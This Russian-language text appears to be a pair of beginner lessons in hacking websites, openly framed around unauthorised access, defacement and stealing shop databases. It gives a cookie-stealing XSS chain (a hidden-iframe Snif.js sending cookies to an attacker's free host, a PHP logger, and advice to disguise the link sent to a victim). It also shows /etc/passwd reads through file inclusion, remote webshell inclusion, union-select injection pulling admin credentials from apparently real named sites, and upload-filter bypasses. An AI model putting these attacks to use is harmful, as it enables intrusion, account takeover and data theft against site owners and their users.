случаи, когда например с помощью sql injection удалось вытянуть аккаунт администратора, но найти админку не удается. Вот стандартные пути: www.site.us/admin<br> www.site.us/administrator<br> www.site.us/admin.php Но бывает, что у админов есть немного мозгов. И они прячут админ панель в недры дирикторый сайта. Что бы найти их нам опять же поможет гугл Site: www.site.us admin Или Site: www.site.us admin.php Ну и тому подобные запросы. А вот такой запрос найдет все текстовые файлы сайта Site: www.site.us filetype:txt Можно попробовать поискать интересные файлы, что то вроде: Site: www.site.us filetype:txt password. Продолжаем знакомится с xss php include sql injection Xss Итак, на прошлом уроке мы научились искать xss, сейчас я покажу из за чего проиходит ошибка и каким образом можно украсть и подменить файлы cookies. Рассмотрим небольшой сценарий: [form name="form" action="questbook.php" method="GET"]<br> [input type=text name="text"]<br><br> [input type=submit name="submit" value="Send"]<br> [?php<br> $message=$_GET[text]; Echo $message; ?] Сначала в переменную $message считывается значение text из массива GET. Далее мы просто выводим надпись. Что касается формы, то в ней расположены текстовое поле (text) и кнопка для отправки сообщения. Так вот. Входящяя информация Никак не фильтруется, т.е. пользователь может ввести любые символы в текстовое поле. А если ввести скрипт, то он сответстенно выполнится. Фактически это и есть причина xss. Так теперь даавйте попробуем украсть Куки. У нас есть xss такого вида. www.site.us/questbook.php?text=[script]alert(xss)[/script] Итак, давайте введем такой скрипт (можешь использовать xss с прошлого урока): <br> www.site.us/questbook.php?text=[script]alert(document.cookie)[/script] Такой скрипт выдаст нам наши Куки. Но нам нужны Куки юзера(админа), причем Куки эти нужно записать в лог файл. Дело в том, что читать Куки от данного сайта, может только сам данный сайт. Поэтому поступаем так: Регестрируемся на бесплатном хостинге с поддержкой php (в конце приведу список), далее создаем файл Snif.js таким содержанием: Snif.js document.write('[iframe width=1 height=1 style=position: absolute; visibility: hidden;" <br>src="'+'http://хост/write.php'+'?host='+location.host+'&cook='+document.cookie+'][/iframe]'); Этот код открывает невидимый фрейм, в котором загружается файл 'http://хост/write. (ему передаются в переменных host и cook хост и COOKIES человека, который открыл страницу). Так как этот фрейм будет являться частью самой зараженной странички, он будет иметь доступ к COOKIESам этого сайта. Далее в сценарии write.php мы просто запишем файлы Кук: Write.php<br> [?<br> $file = fopen("cookies.txt","a");<br> fputs($file,"[".date("d.m.y H:i").]: host=".$_GET[host].", COOKIES=.$_GET[cook].rn");<br> fclose($file);<br> ?]<br><br> Такс у нас есть файл с javascript кодом который ворует Куки, у нас есть файл которые эти Куки сохраняет. А скрипт в xss будет такой: www.site.us/questbook.php?text=[script src=http://хост/snif.js][/script] Все, осталось только дать ссылку жертве. Напоследок вот еще что выше привиденный адрес довольно подозрительный. Его лучше закодировать в шестнадцатеричный код. Это можно сделать <href=http://x3k.ru/>здесь. В разделе En/De Coder нужно выбрать Url Encode. PHP include Опять же наипростейший пример: [?php<br> $f=$_GET[file];<br> if(file_exists($f)) <br> Include(file);<br> ?] Как видишь функция include подгружает указанный файл. Проме include существует почти аналогичная функция require. Так вот. Данные берутся из get массива. Т.е. мы легко из можем подделать: x3k.ru/ www.site.us/include.php?file=/etc/passwd x3k.ru/Это пример из прошлого урока. Теперь разберем еще один кусок кода: [?php<br> $f=$_GET[file];<br> $f2=fopen($f.txt,r));<br> ?]<br> Тут уже используется функция fopen, которая также уявзима. В коде мы к имени файла прибавляем расширение .txt т.е. когда мы будет пытаться читать локальные файлы это будет выглядеть так: <br> /etc/passwd.txt Естественно ничего мы прочитать не сможем. Выход использовать NULL байт. %00 нуль байт. После его вставки часть строки обрубается. Смотри: <br><br> /etc/passwd%00.txt В итоге будет: <br><br> /etc/passwd А вот на примере: <br><br> www.site.us/include.php?file=/etc/passwd%00 Бывает что и это не помогает прочитать файлы. Иногда нужно подняться на несколько дирикторий выше что бы появилась возможность посмотреть файл. Смотрим на примере: www.site.us/include.php?file=../../../../../../../../../../../../../etc/passwd%00 Итак во первых для просмотра файла /etc/passwd нужно перейти в корневую дирикторию и далее зайти в папку /etc. Тоeсть сначала мы добираемся до корня. Это делается с помощью двух точек и слеша. Дело в том что в unix системах… означает каталог выше. Т.к. расположение файла неизвестно и надежнее будет поставить побольше знаков «../» Всегда обращай внимание на ошибки которые появляются после вставки какого либо запроса. Вот смоти: Php include bug <br> http://www.wkar.msu.edu/sportstalk/page.php?StaffID=37&fill=[hacked] Смотрим на ошибку: Warning: include(content/[hacked].php) [function.include]: failed to open stream: No such file or directory in /home/httpd/htdocs/sportstalk/page.php on line 23 Как видишь используется функция include() к имени прибавляется расширение .php, значит нужен NULL byte, к томуже мы узнали расположение текущего сценария (/home/httpd/htdocs/sportstalk/page.php). SQL injection На прошлом уроке я обещал подробнее рассказать про уязвимость SQL injection, этим мы сейчас и займемся. Во первых разберем небольшую иерархию. База данных<br> Таблица<br> Столбец<br> Поле<br> На примере это выглядит так: База данных onlineshop Таблица onlineshop.users ----------------------- | Login password | ------------------------ Stas 123456 Misha 123456 Maxim 123456 Roma 123456 ------------------------ Что сдесь что?: Login password это столбцы. Имена пользователей и пароли это поля. Вот собственно и все. А вот так составляется запрос в php: <br> ..<br> $q=SELECT * FROM USERS where login=$login password=$pass<br> ..<br> Во первых SELECT выбирает данные из таблицы Where задает условие, т.е. в нашем случае нам нужно выбрать данные с определнные логином и паролем. Вот собственно и ошибка. Если подставить $login или $pass не фильтруются, то появляется возможность выполнять SQL команды. Теперь конкретно как мы это делаем: Допустим где то на сайте нашли ниъекцию: <br><br> www.site.us/sql?id=1 Далее мы подобрали что столбцов 6: Активные 3,4 <br> www.site.us/sql? id=1+union+select+1,2,login,password,5,6+from+onlineshop.users /* Это покажет нам аккаунт первого пользователя. Как правило таковым является администратор. Если нужно выбрать конкретного пользователя поступаем там: <br> www.site.us/sql?login=1+union+select+1,2,login,password,5,6+from+onlineshop.users+limit 1,2 /* Так выбираем 2 пользователя. Замечу что знак пробела мы заменяем символом +. А знак /* означает комментарий. Значит после этого знак весь ненужным запрос будет обрезан. И еще допустим с помощью order by мы подобрали кол во столбцов. Делаем так: www.site.us/sql?id=1+union+select+1,2,3,4,5,6/* По идее мы должны увидить читабельные столбцы, но бывает, что вывода не проиходит. Тогда нужно поступать так: www.site.us/sql?id=-1+union+select+1,2,3,4,5,6/* Послесловие: Ну вот. Советую получше изучить mysql и php, а также как они взаимодействуют друг с другом. На следущем уроке мы будет разбирать реальный сплоит. Также я расскажу про ReversIP. Покажу несколько инструментов, которые пригодятся при взломе. Так же мы будет продолжать знакомится с уязвимостями. Я расскажу что такое обход фильтрации в xss В разделе про PHP include мы будем разбирать как читать и использовать в своих целях логии apache. Еще мы конечно же будет подробнее изучать скуль инъекции. Покажу опять же обход фильтрации и особенности 5 ветки mysql Ps в комментариях прошу не флудить. Лучше задавайте вопросы по статье. Несколько бесплтных хостингов с поддержкой php www.yard.ru<br> www.holm.ru/?p=34880<br> www.hostland.su/<br> www.hut.ru/<br>
  24. Основы. Привет читатель. Я решил долго не тянуть и уже в этой статье рассказать о том, какими способами взламывают сайты, какие бывают уязвимости и зачем собственно взламывать сайты.Что вы узнаете на сегодняшнем уроке:Кто и зачем? Какие бывают уязвимости. Веб шелл, как и что. Примечание: курсивом будут выделены слова, которые возможно будут вам не понятны. Найти их значение вы сможете в конце статьи. Кто и зачем? Вообще под понятием взлома я понимаю несанкционированный доступ к чему-либо. Мы ломаем веб сайты. Поэтому нам нужно получить доступ к административной панели, либо украсть базу данных сайта, либо просто изменить главную страницу. Все зависит от такого для чего производится взлом. Рассмотрим основные мотивы: Изменения главной странички ради удовольствия && мести. Это называется «дефейс» сайта Воровство базы данных — это может быть выгодно если мы например взломаем базу данных онлайн шопа (магазина). Либо производится взлом на заказ и заказчику нужна база Взлом производиться ради повышения прав на сервере. Теперь поговорим о таком понятии как скрипт кидди. Скрипт кидди — это люди, как правило не слишком разбирающихся в хаке и программировании. Т.е. которые не могут самостоятельно найти уязвимость и реализовать ее. Так как же они взламывают? Они попросту используют чужие наработки. Допустим скрипт кидди нужно взломать один форум. Он узнает версию форума и идет на багтрак. Находит описание уязвимости и использует ее. Багтраком называют сайт на котором расположены описание уязвимостей форумов CMS, и где выкладываются эксплоиты. Либо второй вариант — для развлечения — скрипт кидди опять же идет на багтрак и выбирает уязвимость. Например, он выбирает сплоит для CMS php nuke 7.0. Далее он идет в поисковик и делает следущюий запрос: site: php nuke 7.0 — этим он получит список сайтов с установленной CMS Nuke Далее он просто использует эксплоит. Это кстати называется гугл хакинг. Как ни крутись, но через период «скрипт кидди» проходил каждый. И придется пройти тебе. Только вот некоторые двигаются дальше, а некоторые останавливаются на этом. Какие бывают уязвимости?Три самых тривиальных уязвимостей это xss sql injection php include В каждом уроке я буду рассказывать понемногу про каждую из них. Сейчас разберем все вкратце не зацикливаясь на деталях уязвимости. XSS. Цель у этой уязвимости одна — украсть Cookes файлы. Итак, сначала из за чего появляются Xss Происходит все это из-за отсутствия фильтрации входящих данных Разберем сразу на примере: www.atlant.ws Справа мы видим текстовое поля для поиска. Попробуем ввести простой html тег И мы увидим линию (в HTML этот тег означает провести линию) В адресной строке мы видим: http://www.atlant.ws/?set=search&www=false&query= Значит данные передаются GET запросом. Но от обычного тега опасности никакой. Попробуем ввести простенький javascript сценарий. www.atlant.ws/?set=search&www=false&query=[script]alert('xss')[/script] Опа. Появилось сообщение. Значит код выполняется. Т.к. в javascript функция alert() выводит сообщение. Это называется пассивная xss. Пассивная она потому что нужно произвести какие то действия что бы выполнить код. В нашем случае нужно передать его в переменную запроса (q) Кроме пассивных xss существует активные. Опять же пример: www.addtop.ru/kom.php?id=32 Вводим в комментарии скрипт [script]alert('xss')[/script] И отправляем его. Видим сообщение. Теперь каждый пользователь, который найден на страничку комментариев увидит его. Чувствуешь разницу? В пассивке нужно производить какие то действия с пользователем. Т.е. нужно передавать ему специальный адрес, по которому он должен пройти. А в активке нужно, что бы пользователь попросту посетил страницу, в которой уже заключен наш код. Пока про xss все. Не хочу нагружать тебя информацией. Попробуй поискать активные и пассивные xss. Так же советую хорошенько изучить, что такое Cookes. В следующем уроке мы разберем, как их воровать. И зачем. В конце статьи я приведу несколько полезный ссылок на эту тему. Введение в PHP include. Если мы найден такую уязвимость то сможем либо читать файлы на сервере либо загрузить вебшелл. Разберем сначала, что такое веб шелл. Веб шелл это php скрипт. C помощью него мы сможем изменять файлы сайта или выполнять команды в системе. В общем, шелл заменяет административную панель. Собственно цель большинства взломов залить веб шелл. Какими способами? PHP include один из них. Итак, давайте поверхностно разберем уязвимость Видим на сайте такой url: www.site.ru?page=home.html Это значит, что на страничку подгружается файл home.html А что если попробовать подгузить свой файл? Например, так: www.site.ru?page=http:/hacker.ru/webshell.php Так мы пробуем загрузить веб шелл на сайт. Если мы увидим результат работы webshell.php значит нам круто повезло. И можно считать, что сайт взломан. Это называется удаленный инклуд. Удаленный потому что нам удалось загрузить скрипт с другого сервера. Кроме удаленных, инклуды бывают локальные. В этом случае мы сможем только читать файлы на сервере. Например, сейчас мы попробуем прочитать файл с именами пользователей системы: www.site.ru?page=/etc/passwd Вот, опять же попробуй поискать php include. Советую воспользоваться google: Inurl:page= Такой запрос покажет нам сайты, в урле которых присутствует строка page=. Далее попробуй подставить любой набор символов в параметр page. Если появиться ошибка, значит скрипт уязвим Кстати если найдешь php инклуд, то можно получить xss вот так: www.site.ru?page=[script]alert(/xss/)[/script] Это работает во многих случаях. В следующем уроке я расскажу о том: почему происходит php include, что такое null byte и трудности при чтении файлов. Введение в SQL Injection Очень распространенная уязвимость. Суть ее использования заключается в том, что бы вытащить необходимую нам информацию из базы данных. Обычно этими данными является логин и пароль администратора сайта. Но иногда возможно залить шелл или прочитать файл с помощью sql injection. Об этом поговорим в следующих уроках. А сейчас самые основы Мы будем разбирать инъекцию при работе с базой данных my sql. Она самая распространенная. Кроме нее часто встречаются mssql, oracle. Каждую нужно взламывать по-своему. Но сейчас mysql.Уязвимость можно найти, если мы увидим что в адресной строке параметру передается числовое значение. Например: http://www.descom.ch/main.php?id=18646644 Что бы проверить параметр на sql injection обычно подставляют кавычку http://www.descom.ch/main.php?id=18646644' либо другие левые символы Видим ошибку. Понимаем что это mysql. Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/www/web137/html/descom/include/queries.inc.php on line 19 Что бы вытащить информацию нужно найти кол-во полей и определить какие из них читабельны (т.е. из каких колонок можно вынудить инфу)Делается это с помощью конструкции order by. http://www.descom.ch/main.php?id=18646644+order+by+10/* Вывод то же самый, значит полей меньше http://www.descom.ch/main.php?id=18646644+order+by+7/* Да. Вывод изменился. Значит полей 7. Теперь нужно получить читабельные поля. http://www.descom.ch/main.php?id=18646644+union+select+1,2,3,4,5,6,7/* Вывод: 4,5. Узнать нам это удалось с помощью конструкции union select У нас есть колонки. Теперь нужно получить информация о базе. http://www.descom.ch/main.php?id=18646644'+union+select+1,2,3,version(),5,6,7/* Видим что mysql v5 — - В этой версии есть кое какие особенности при взломе, но пока разбирать это не будем и попробуем просто подобрать таблицу. Делается это так: http://www.descom.ch/main.php?id=18646644'+union+select+1,2,3,version(),5,6,7/+from+таблица/* таблицу нам нужно подобрать самим. Самые распространенная это user или users. Список часто используемых таблиц можно найти по этой ссылке В нашем случае мне удалось узнать, что имя таблицы user. Теперь можно приступить к выводу информации. Нам нужно достать логин и пароль. Попробуем: http://www.descom.ch/main.php?id=18646644+union+select+1,2,3,name,password,6,7+from+user/* И у нас на экране логин и хеш пароля администратора. Вот таким не хитрым образом удалось поломать базу. Кстати здесь тоже имеет место xss: http://www.descom.ch/main.php?id=18646644+union+select+1,2,3,[script]alert(/xss/)[/script],5,6,7/* Итак, мы разобрали три основных уязвимости. Я не стал пока копать глубоко, а рассказал только поверхностную информацию, что бы немного вас завлечь. В следуюих уроках я буду рассказывать о причинах уязвимостей, так же буду приводить куски уязвимых программ. Так что желательно подучить php и mysql Кстати набор инъекция и инклудов для тренировки ты всегда сможешь найти на форуме хакзоны: sql inj php inc Еще парочка способов загрузить веб шелл. Как ты наверное уже понял главное это веб шелл. Выше я показывал, как его можно залить с помощью php include. Но это конечно не единственный способ На множестве сайтов присутствует возможность загрузки каких либо файлов. Уже догадался? Мы без проблем сможем вместо обычного файла подставить веб шелл. Но не все так просто. Иногда скрипт проверяет разрешение. Допустим нам можно загрузить картинку. Но если вместо нее мы попытаемся залить файл webshell.php скрипт может проверить разрешение и запретить загрузку. Это можно обойти таким способом: Поменять разрешение на такое: webshell.php.jpg. и возможно нам удастся загрузить шелл. Но бывает, что сайт проверяет не только имя файла, но и его содержимое. Т.е он смотрит картинка это или текст Для этого можно поступить вот так: Открыть картинку в любом текстовом редакторе и в конце добавить php скрипт. Термины, используемые в статье. Ниже я приведу слова, которые возможно были тебе не понятно по ходу статьи: Дефейс — замена страницы сайта на свою либо редактирование страницы под собственные нужны. Например «Hacked by вася» CMS или еще говорят движок-двиг — система управления сайтом. Эксплоит — сплоит -exploit-xploit — программа автоматически реализующая какую либо уязвимость. По сути, сплоит можно написать почти на любом язык программирования Cookes файлы которые применяется для сохранения данных на стороне пользователя, на практике обычно используется для:аутентификации пользователя; хранения персональных предпочтений и настроек пользователя; отслеживания состояния сессии доступа пользователя; ведения статистики о пользователях. Если мы украдем «Куки» администратора сайта и заменим их на свои, то без проблем сможем аутентифицироваться как админ. В следующей статье я как раз расскажу про воровство Cookes с помощью xss bugtraq-багтрак — Сайт на котором располагаются эксплоиты и описание уязвимостей в CMS форумах и программном обеспечении. Google hacking — гугл хакинг — Использование поисковика google для поиска уязвимых стайтов либо для сбора информации о сайте. Послесловие Вот и подошел к концу 2 урок. На следущем мы более подробно разберем xss php include и sql injection. Далее я покажу несколько приемов в веб хаке. И в конце мы поговорим об эксплоитах. Для самообразования можно почитать вот это: xss <a href=sql injection www.fssr.ru/hz.php?name=News&file=article&sid=7815>sql injection <a href=include www.nulled.ws/showthread.php?t=25867>php include
×